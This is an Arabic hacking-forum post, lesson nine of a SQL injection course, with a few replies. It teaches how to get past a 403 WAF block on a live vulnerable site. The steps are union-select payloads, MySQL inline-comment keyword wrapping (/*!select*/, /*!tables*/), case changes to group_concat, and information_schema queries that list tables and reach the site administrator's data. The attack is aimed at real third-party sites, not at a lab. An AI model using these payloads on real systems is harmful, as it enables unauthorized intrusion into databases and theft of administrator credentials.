{الدرس التاسع}تخطي الــForbidden 403

{الدرس التاسع}تخطي الــForbidden 403

السلام عليكم ورحمة الله وركاته
================
دورة احتراف
SQL Injection

مقدمة من قبل الهكر الجزائري
Mohamed10060

الدرس التاسع من الدورة
^_^
تخطي الــForbidden 403
=====================
نبدأ درسنا ببسم الله
===========-^__^-===========

اولا نفتح الموقع المصاب

وهذه صورة من موقع انا وجدتو وهو مصاب
وهذه صورة للخطأ

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]

طيب نضيف للرابط
كود:
+order+by+1--

لمعرفة عدد الأعمدة
وقد شرحت كيفية معرفة عدد الأعمدة
انا ظهر لي عدد الأعمدة للموقع ال حطبق عليه
6

طيب نبدل امر استخراج عدد الأعمدة
كود:
+order+by+

بأمر استخراج العامود المصاب
كود:
+union+select+1,2,3,4,5,6

مع تغيير
1,2,3,4,5,6
الى عدد الاعمدة ال بالموقع ال مستهدفه انت
طيب بعد الاستبدال نفتح الرابط

شوفوا شو ظهر لنا
Forbidden 403
طيب كيف نتخطاها
منعدل بالامر

كود:
select

بي
كود:
/*!select*/

يعني الرابط بيصير كذا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
بعد تعديل الامر نفتح الرابط ونشوف اذا ظهر لنا رقم العامود المصاب

تمام ظهر لنا رقم العامود المصاب وهو 3
وتخطينا المشكلة

طيب الان منكمل حقن
نضع مكان العامود
امر استخراج اصدار القاعدة
كود:
version()

نضعه ونشوف اذا بيظهر لنا الاصدار

تمام ظهر لنا الاصدار وهو الخامس

طيب نبدل
امر استخراج اصدار القاعدة
كود:
version()

بأمر
كود:
group_concat(table_name)

ونضع بنهاية الرابط
كود:
+from+information_schema.tables+where+table_schema=database()

بعد التعديل نفتح الرابط ونشوف اذا حتظهر لنا الجداول

اوووووووووه واجهتنا نفس المشكلة
طيب

منبدل
كود:
group_concat

بي
كود:
GROUP_CONCAT

يعني منحول من سمول الى كابتل

ومنبدل
information_schema.tables
بي
كود:
information_schema./*!tables*/

يعني الرابط بيصير كذا

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
طيب بعد التعديل نفتح الرابط

ونشوف اذا حتظهرلنا الجداول

يا سلام اتخطينا المشكلة مرة اخرى
وظهرت لنا جميع الجداول

ولن اطول الشرح اكثر
انتو بتكملو عملية الحقن عادية بتستخرجوا الجداول
وبيانات مدير الموقع

يعني اذا بدكم تستخرجو الاعمدة فقط بتبدلو
Table_name
بي
column_name
وا
كود:
/*!tables*/

بي
كود:
/*!colums*/

هذه تكون نهاية الدرس التاسع من الدورة
ارجو ان يكون الدرس واضح ومفهوم
ولي عنده اي اسفسار يضعه في هذا الموضوع

الى اللقاء في الدرس التاسع من الدورة

بالتوفيق للجميع

اخوكم في الله

Mohamed10060
.

بارك الله فـــــيـــــك

dr1 et mrc pour la visite Razz

الاخ محمد ..برغم كل هذا لا زالت تخرج الرسالة التالية

((
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
))

ما العمل جزاك الله خيرا

يجد من قام بتغير الحماية
قم بالبحش في جوجل عن التخطي يوجد كثير من الطرق

» {الدرس السابع} تخطي مشكلة عدم ظهور الخطأ عند استخراج عدد الأعمدة
» {الدرس الثالث} استخراج عدد الأعمدة باستخدام +order+by+
» {الدرس العاشر}ما هو الهاش وكيفية التمييز بين الهاشات
» {الدرس الأول} ما هي ثغرة ألـSQL injection وشـرح لأهم أوامرها
» {الدرس الثاني} معرفة المواقع المصابة بثغرة الـSQL injection